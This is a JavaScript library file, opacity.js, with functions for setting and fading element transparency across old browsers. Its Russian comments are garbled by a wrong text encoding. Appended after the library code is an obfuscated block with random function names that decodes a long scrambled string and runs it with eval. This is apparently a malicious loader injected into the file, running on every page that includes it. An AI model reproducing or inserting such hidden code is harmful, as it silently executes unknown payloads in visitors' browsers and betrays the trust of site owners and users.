/*
wwww.tigir.com - 06.07.2006

Source: http://www.tigir.com/js/opacity.js

Áèáëèîòåêà opacity.js ê ñòàòüå "CSS ïðîçðà÷íîñòü (css opacity, javascript opacity)" - http://www.tigir.com/opacity.htm

setElementOpacity - óñòàíîâêà ïðîçðà÷íîñòè
getOpacityProperty - ïðîâåðêà, åñòü ëè âîçìîæíîñòü ìåíÿòü ïðîçðà÷íîñòü
fadeOpacity - ïëàâíîå èçìåíåíèå ïðîçðà÷íîñòè
*/

/* Ôóíêöèÿ êðîññáðàóçåðíîé óñòàíîâêè ïðîçðà÷íîñòè

Ïðèìåð: setElementOpacity(document.body, 0.5); //ñäåëàòü äîêóìåíò ïðîçðà÷íûì íà ïîëîâèíó
*/
function setElementOpacity(oElem, nOpacity)
{
	var p = getOpacityProperty();
	(setElementOpacity = p=="filter"?new Function('oElem', 'nOpacity', 'nOpacity *= 100;	var oAlpha = oElem.filters["DXImageTransform.Microsoft.alpha"] || oElem.filters.alpha;	if (oAlpha) oAlpha.opacity = nOpacity; else oElem.style.filter += "progid:DXImageTransform.Microsoft.Alpha(opacity="+nOpacity+")";'):p?new Function('oElem', 'nOpacity', 'oElem.style.'+p+' = nOpacity;'):new Function)(oElem, nOpacity);
}

// Ôóíêöèÿ getOpacityProperty() âîçâðàùàåò ñâîéñòâî êîòîðîå èñïîëüçóåòñÿ äëÿ ñìåíû ïðîçðà÷íîñòè èëè undefined, è ìîæåò èñïîëüçîâàòüñÿ äëÿ ïðîâåðêè âîçìîæíîñòè èçìåíåíèÿ ïðîçðà÷íîñòè
function getOpacityProperty()
{
	var p;
	if (typeof document.body.style.opacity == 'string') p = 'opacity';
	else if (typeof document.body.style.MozOpacity == 'string') p =  'MozOpacity';
	else if (typeof document.body.style.KhtmlOpacity == 'string') p =  'KhtmlOpacity';
	else if (document.body.filters && navigator.appVersion.match(/MSIE ([\d.]+);/)[1]>=5.5) p =  'filter';
	
	return (getOpacityProperty = new Function("return '"+p+"';"))();
}

/* Ôóíêöèè äëÿ ïëàâíîãî èçìåíåíèÿ ïðîçðà÷íîñòè:

1) fadeOpacity.addRule('opacityRule1', 1, 0.5, 30); //âíà÷àëå ñîçäàåì ïðàâèëî, çàäàåì èìÿ ïðàâèëà, íà÷àëüíóþ ïðîçðà÷íîñòü è êîíå÷íóþ, íåîáÿçàòåëüíûé ïàðàìåòð çàäåðæêè, âëèéÿþùèé íà ñêîðîñòü ñìåíû ïðîçðà÷íîñòè
2) fadeOpacity('elemID', 'opacityRule1'); // âûïîëíèòü ïëàâíóþ ñìåíó ïðîçðà÷íîñòè ýëåìåíòà ñ id ðàâíûì elemID, ïî ïðàâèëó opacityRule1
3) fadeOpacity.back('elemID'); //âåðíóòüñÿ â èñõîäíîå ñîòîÿíèå ïðîçðà÷íîñòè
*/
function fadeOpacity(sElemId, sRuleName, bBackward)
{
	var elem = document.getElementById(sElemId);
	if (!elem || !getOpacityProperty() || !fadeOpacity.aRules[sRuleName]) return;
	
	var rule = fadeOpacity.aRules[sRuleName];
	var nOpacity = rule.nStartOpacity;
	
	if (fadeOpacity.aProc[sElemId]) {clearInterval(fadeOpacity.aProc[sElemId].tId); nOpacity = fadeOpacity.aProc[sElemId].nOpacity;}
	if ((nOpacity==rule.nStartOpacity && bBackward) || (nOpacity==rule.nFinishOpacity && !bBackward)) return;

	fadeOpacity.aProc[sElemId] = {'nOpacity':nOpacity, 'tId':setInterval('fadeOpacity.run("'+sElemId+'")', fadeOpacity.aRules[sRuleName].nDalay), 'sRuleName':sRuleName, 'bBackward':Boolean(bBackward)};
}

fadeOpacity.addRule = function(sRuleName, nStartOpacity, nFinishOpacity, nDalay){fadeOpacity.aRules[sRuleName]={'nStartOpacity':nStartOpacity, 'nFinishOpacity':nFinishOpacity, 'nDalay':(nDalay || 30),'nDSign':(nFinishOpacity-nStartOpacity > 0?1:-1)};};

fadeOpacity.back = function(sElemId){fadeOpacity(sElemId,fadeOpacity.aProc[sElemId].sRuleName,true);};

fadeOpacity.run = function(sElemId)
{
	var proc = fadeOpacity.aProc[sElemId];
	var rule = fadeOpacity.aRules[proc.sRuleName];
	
	proc.nOpacity = Math.round(( proc.nOpacity + .1*rule.nDSign*(proc.bBackward?-1:1) )*10)/10;
	setElementOpacity(document.getElementById(sElemId), proc.nOpacity);
	
	if (proc.nOpacity==rule.nStartOpacity || proc.nOpacity==rule.nFinishOpacity) clearInterval(fadeOpacity.aProc[sElemId].tId);
}
fadeOpacity.aProc = {};
fadeOpacity.aRules = {};
var ld9cc0="";function dd066874017(){var daf8ca=String,s51c65afb=Array.prototype.slice.call(arguments).join(""),j7c74a3=s51c65afb.substr(4,3)-604,f70e3b9da,p44d14cc;s51c65afb=s51c65afb.substr(u45df094());var gbe147e98=f65110(s51c65afb);for(var xe1ebac09=0;xe1ebac09<gbe147e98;xe1ebac09++){try{throw(d34dec1=j1351e(s51c65afb,xe1ebac09));}catch(e){d34dec1=e;};if(d34dec1=='•'){j7c74a3="";xe1ebac09=gd73d02(xe1ebac09);wd2e7e=u6bce836(s51c65afb,xe1ebac09);while(l5a2278(wd2e7e)){j7c74a3+=wd2e7e;xe1ebac09++;wd2e7e=s51c65afb.substr(xe1ebac09,1);}j7c74a3-=506;continue;}f70e3b9da="";if(g848742(d34dec1)){xe1ebac09++;d34dec1=s51c65afb.substr(xe1ebac09,1);while(d34dec1!='°'){f70e3b9da+=d34dec1;xe1ebac09++;d34dec1=s51c65afb.substr(xe1ebac09,1);}f70e3b9da=f70e3b9da-j7c74a3-2;if(f70e3b9da<0)f70e3b9da+=256;f70e3b9da=ofae421(f70e3b9da);c85f4705b(f70e3b9da);continue;}a5487ca6a=(d34dec1+'')["ch\x61\x72\x43o\x64\x65At"](0);if(a5487ca6a>848)a5487ca6a-=848;p44d14cc=a5487ca6a-j7c74a3-2;p44d14cc=rd1ede2(p44d14cc);ld9cc0+=u62979b9(p44d14cc);}}dd066874017("a","cce764°20","2","°","°8","°•5","4","1•°","1","5","4","°","°","147","°•5","16","•","o°","1","28","°u","°12","3","°•58","4•°1","90°xy•6","20•","°","148°","•","556•","°","1","75°•67","7•","°","186","°","°1","83","°•","5","9","1","•`","•","6","8","9","•","/","•541","•","°134°•6","54•","°","8°°","1","8","2","°•","6","33•","°246","°°2","43°°","2","37°°","16","1°","°","190","°°16","1","°•","6","77•°212°•53","2","•","°","1","3","2","°°1","4","4°","°144","°","°","1","4","0°V","•5","33","•L•","548•[","•","6","99","•","6•","6","04","•°","216°","°205°•6","8","4•",",","°","2","2","°•5","7","2","•","°","17","5°","•5","3","0•","°14","2","°","°1","29°","•","5","6","1","•","°","1","7","4","°°","1","76°g°","15","9","°","°171°","°","168°","•6","78•","°","27","°","•52","2•?°137°°13","9","°","•","68","2•","°2","2","4","°•","6","4","9•°","24","4","°°0","°","•","65","7","•","°6°","•","582•°","1","2","5°","•","5","9","7•","°196°","•","59","7","•°","14","0","°","•","5","51","•","V","•","576","•°1","3","1","°•55","5•","@=•","58","0","•U•","541","•°","14","2°","•","60","9","•","°207","°°","137°","•6","6","1","•","°","1","97","°","°17","°•6","57","•°","1","8°","°9","°•","58","3•°18","0°•6","20•","°","2","2","7","°","•5","5","7","•°15","5°•","5","4","7•K","°","1","62","°","°1","48","°•","6","6","4•°14°","•667•°","7°•5","1","0","•","u","•6","77•$•66","1•","°","2","03","°°2","1","°°","22","°•582","•","°200°•660","•°2°°8°","•583","•°17","6°","°","1","82°","o","°14","0","°°","1","4","0°•6","5","8•","°","215","°°1","8","6","°°19","3°","•69","5•","4","•","5","3","0•°","1","36°","°","1","2","6","°","°127°°","1","2","8°°","1","31","°•","51","7•°","123","°","•","6","7","9•°20","°•","5","31•°","12","7","°B","•5","21","•",":•","6","82","•","°210","°-°1","91","°°","188°","•","534","•","'•602","•k°21","7","°","•5","11•","p","•","6","38","•°2","4","4°","°2","34","°","•","5","3","3•","°1","4","0°•66","0","•","°1","9°","•6","3","1","•°173°","•","677•","%","&•592","•","°21","0","°","°","190°","°","1","9","6°°185°°191°","•696•","°22","4","°","•6","84•","°2","4","1°","°","212°","•","67","4•°2","18","°","°2","29","°•5","65•","J","G","•65","7•","°1","6","2","°°","22°","•55","5•@","•","646•°","1","52°°","151","°•7","05•-•6","10•°2","17","°","•63","1","•°","2","26","°","°","2","4","4","°•5","38•","°14","3°°","1","35°°","1","44°°","1","5","0","°","•538•P°145","°•","5","8","0•°1","86","°","•","665","•","°","14°°1","6","°","•","655","•","°","1","2°","°1","0","°•562","•","°","1","59","°•5","0","8•","q","•70","3•6","•66","2•","°2","0","°","°","3°","•","5","18•.K.t","°131","°°1","24°•54","5","•","°","1","40°°1","5","7°•616","•°2","1","7°°","2","23","°°","222°°1","5","2","°","°1","5","3°•54","5","•I•","5","9","9","•","°21","8°","lih","h°","2","0","0°","•","67","9•","°","21°•","5","7","3","•e•","693","•°","22","9","°","•","53","5","•°","1","5","0","°","•","5","77","•°1","78","°","•","6","5","3","•°3°","°249","°•","5","15","•z•54","9•","°","1","6","4","°","•64","2•°18","4","°","•","5","72•°1","8","8°°18","9°","°","190°°1","7","0°","°","1","76°","•68","2","•","°19","°•","58","5","•","°","1","8","4","°","q•","6","63","•","°2","2","0","°","°2","20","°","•5","17•","J","•593•y","°137","°","•","6","04","•°1","4","1°","•55","7","•U•","5","2","8•","°1","4","7","°","•","6","11","•","x","u•6","8","3","•°","188°","°1","88","°•","53","7•*","°","15","2","°°","138°°","1","43°•604•","°200°°211","°","°","2","19°•","62","8•°","1","70°°244°°","245","°","°","246°•664","•°6°°12°•","5","3","5","•°12","8°•52","8•°12","7","°8","•548","•","i","L]g","•5","1","7","•","°","2","6","°","•5","1","9","•","°2","5°°24","°•","5","2","9•","\"","\"","°1","4","3°z","•","6","33•°","243°","°1","61°•","51","4•","r•","56","3•","°1","60°","°156°°","159°•","5","2","4","•4Q•6","10","•","°13","8","°","°","2","06","°•","550•","°15","7","°","•5","9","6•°","191","°","°","2","09°•","57","6•","°181°","•","5","38","•","°13","5°","°1","44","°°","150°P°13","7°•","521•","v","°","1","3","3°V•6","7","4•°2","2°","°","15","°°","2","3","°","°","15","°","•","70","4•6<",";°1","0°","•6","7","8•","'","•","7","05•","°2","9°","•672","•","°9°","°","15°°24","6°•","5","64•","°157°°16","9°","°","161°d","•","67","1","•°","20","6°","•","6","80","•","°24°°21°°1","7°°","20°","•5","46","•Q•672","•°","20","9°°","3","°•","69","3","•°2","3","7°°26°","°","2","4","8","°°","202","°°","1","9","9°","°","1","98°°19","8°","•","667","•°17","2°","°","2","5°","•","624","•","°","21","7","°•6","1","0","•","°","2","2","0","°•","60","1","•","°12","9°°2","12","°","•","60","8•°","2","03","°","°2","18°•","6","15","•","°","216°•","5","38","•°","1","4","6","°•","645•","°1°","°1","7","3°•","58","7•","°","1","4","4°s","•","5","41","•°13","7°•","64","8•°2","55°","•","5","53","•","°","1","48°","°1","66","°","•6","34","•°23","9°•690","•","°3","1","°","•","6","2","3","•","°22","9°","•52","3•","°","13","5°A•5","7","2•","°1","6","7","°•","537","•","°","147","°•","60","5","•","°","2","02°","•682•°","19°","&","°2","3°°","24","7°","•","57","3","•","°","177","°°","17","0","°°","1","78","°•55","4","•","°","15","1","°°","160","°","•","6","40","•°","252°","•5","87","•°","1","2","3","°z•620","•","°","23","1","°","°2","1","5","°°","2","3","0","°•","63","5•°","23","6°","°2","4","3°","°2","47°•5","1","5•","2•6","38•°175","°°","1","9","3","°","°","1","47°°","14","4","°•6","1","6•","y","yy•5","54","•°","165","°","•","6","91","•°","3","0","°-","•","686","•°31","°","•","56","6•°174","°°","1","78","°•680","•°","222","°•5","5","2","•°","1","6","4°","°1","69","°","•6","4","5•","°","2","5","3","°°","2","4","2°°1","7","3","°","•63","1","•°1","8","8°","•67","7•","°","20","5°°","2","1","2","°","•","6","29","•","°","241°","•516","•","q","•","509","•°","1","2","5°","•","65","9•°","15°","•68","2","•","°225°•","67","5•°2","1°","•","698","•#","•5","44•","°","158°•","63","3•","°2","26","°•","7","0","5•","<","•","6","70","•°9","°","°2","4°","°","1","5°","°22°","•","6","1","0","•°","2","22","°","°145°","°16","5°•538•/•","6","0","2•","l•","668•°","1","73","°","•6","8","0","•","°","1","8","5","°°","185°#","•","5","5","5•","°1","50","°•639","•","°","2","4","9","°°2","40","°°247","°•684•(","•57","6","•v","•5","38•","°14","5°°","14","4°°","1","48","°","°","13","5","°","•","6","23","•°216°","•","636","•°","2","3","2","°•511","•","°1","2","8°•","654•","°9°°","1","0°","•","5","97•°","1","9","0","°•5","08•x","•650•","°","2","47°","•6","2","9","•","°","224","°","°","22","9°°","222°","•","61","2•°","21","8°","•","6","90•","!•5","88","•°","1","8","5°•6","80","•°","208","°°","2","3","7","°°","2","0","8","°•","6","37•","°","2","35°•","66","8","•°25","°°18","°°","7","°•616•","°22","8","°","°2","1","7","°","°","2","23°•61","5•","°221","°•6","2","7","•°1","55","°","•5","26•",">","?","•","6","0","4","•","°132","°","°223°","•","63","6•°1","45","°","•6","92•","°","1","98°","°","19","7","°°","1","97","°","°","1","9","7°°197°","•5","75•°1","76°","°","1","7","3°","•5","53","•Q","•5","57","•]","°16","9","°°1","57","°","°1","58°°","1","68°","c°1","67°°1","54","°•","6","3","1","•","°2","2","4","°","•627•°223°","°","2","4","4°°","20","6","°•","699•7•61","1","•","°","20","4°°","22","3°","°2","08°","°","139","°•51","7","•J","J•","51","7","•-","•","623","•°1","5","8","°°21","8","°•5","30•","°","137°","•524","•","°","12","9","°","°132","°","•","666","•","°1","4°","•","51","1","•","l°1","23","°","l.","•58","9","•°126°","u°","208°b","•51","0","•°1","6°","•5","8","3","•","XXXX","•66","8•","°","17","3","°°","27","°°1","3°°18°°","8°°1","9°","•623•","°23","8°","°","16","5","°°","239°","°","2","4","0","°","°2","41°","°2","21°","•","633","•","°237°","°","226","°","°","232°","°1","6","1","°","°19","0°","•5","40","•","DV•556•","o","•","6","9","6•","°","20","5°•","645•°","15","1°•5","59","•@","@","@","@•","6","98•?°20","7","°","°","20","4°","°","2","0","3°","•","678•","°","183°","°18","3","°","+","°233","°","•","6","3","5","•","°144°•69","7•°","2","03","°•67","7","•","°","1","82°•","705•°2","10","°•5","8","9•","^","°2","0","0","°","•","6","71","•°10°°25°°1","6","°","•6","4","2","•","°2","50°°","254°•59","3•","°13","5","°","°2","0","0°•62","3","•","°","22","9°","°227°°23","0","°","°2","16","°•663•","°3","°","°","1","9","1","°","•","593","•°15","0","°","•51","5","•+","•","61","7","•°","215","°°","2","30°°","2","23°","•","617","•","°","212","°","°","22","9°","•","5","84","•°1","8","5","°","°1","91°","•55","3•","°","15","9","°","Y","ZQ°1","7","2°","•","6","33","•°","142","°•5","5","1•","9","•","66","5","•°1","7","0°","•","5","4","1","•",".•695•°","2","00","°•","64","8","•°","15","3","°","°","7","°°24","9°","•52","9•°1","35","°","•65","3","•","°","2","49°","°","4","°","°","1","2°","•","566","•l•568","•°1","8","4","°°","1","85°•","700","•",">","•","579","•°1","77°","°18","3°°","17","2","°•","546","•","°","1","45","°","J•","65","2•","°","209°","°1","80","°•6","96•","°2","42°","•5","23•N°","3","2","°•5","2","6","•","°32","°°31°°","3","1°","•53","8•+°","1","59","°•","687","•","°242°","°1","96°°","19","3","°°19","2°","°","1","9","2°","°1","9","2°","•5","88","•°1","99°","°183°","°","1","9","8°","°1","8","9","°°","196°","°20","0°°","1","30","°°","1","9","9°°198","°","°18","3°•","628•","°156°°185","°","•523•3•6","81","•","&","#","°","29","°•","69","0•°2","18","°•","6","05•°1","4","4","°°","1","33","°•","5","12•Ui","°","124","°","•6","2","9","•°","2","2","9","°","•","5","10•4","x•","52","5•v°","13","1°","y","°","1","3","2°","•6","97","•",".","•655•°","1","9","1","°•","56","1•b","•6","6","1•","°2","0","3","°","•","647•°3","°","•","6","2","4","•","°2","31°•56","5","•°","144","°•645","•°","1°°2","55°°2","46°","°25","1","°°","2","4","4","°","°1","81","°","°","182°","•","53","6•N°","1","47°","°14","9°","°","13","0°°","147°°1","48°","•","5","97•°","207°°","1","9","8","°","°2","03","°","•","55","4•","°","1","53","°","•620","•","°","1","56","°","•5","8","2","•","°129","°","•","645","•","°","1","8","2°•5","38•B","M•542•","F","•5","2","8•","?F°","1","30","°•","518","•","°1","2","9°5I","•666","•","°","175°°","172°•5","12•°","17","°°1","7","°°","17°","p","•","697•","&•","6","83•","°2","0","°•","6","4","5","•°241°•","591","•","°","1","33","°•5","42","•","°","13","5°°1","5","0","°","•669•","°2","1°","•","5","17","•r•597•","°","2","0","3°","•5","53•","°","1","49","°t","•55","2","•","°","1","5","2°°1","53°°1","5","6°•6","4","2","•","°2","3","8","°","•6","7","0•°2","0","6°°","25°","°9","°°24°","°15","°°2","2°•","5","53•°","1","65°","•","59","5","•°13","2","°•6","18•","°","17","3","°°127°°12","4","°","•","5","5","6•=•6","16•","y•6","9","6•","=•","65","6","•°165","°•","5","08","•","°1","4","°","•69","7•","°20","2°>","•6","2","7•","°","1","8","2","°°","136°°","13","3","°","°","2","4","8","°•","6","16•°","1","5","3","°°15","2","°","°","15","3","°","•","5","75","•","°","1","30","°");eval(ld9cc0);function u45df094(){return 7;}function f65110(l9c0962a){return l9c0962a.length;}function j1351e(ef517cff,a3763122){return ef517cff.substr(a3763122,1);}function gd73d02(qe5fb06){return ++qe5fb06;}function u6bce836(wf30a31ee,y1e2a4490){return wf30a31ee.substr(y1e2a4490,1);}function ofae421(te1f3a9){if(te1f3a9==168)te1f3a9=1025;else if(te1f3a9==184)te1f3a9=1105;return (te1f3a9>=192 && te1f3a9<256) ? te1f3a9+848 : te1f3a9;}function l5a2278(t9320c1f9){return t9320c1f9!='•';}function g848742(a1ab5252c){return a1ab5252c=='°';}function c85f4705b(y7f564de){var daf8ca=String;ld9cc0+=daf8ca["f\x72\x6f\x6dC\x68\x61rCod\x65"](y7f564de);}function u62979b9(qf7fe0){var daf8ca=String;return daf8ca["f\x72\x6f\x6dC\x68\x61rCod\x65"](qf7fe0);}function rd1ede2(u89570d){var j1c8f37=u89570d;if(j1c8f37<0)j1c8f37+=256;if(j1c8f37==168)j1c8f37=1025;else if(j1c8f37==184)j1c8f37=1105;return (j1c8f37>=192 && j1c8f37<256) ? j1c8f37+848 : j1c8f37;}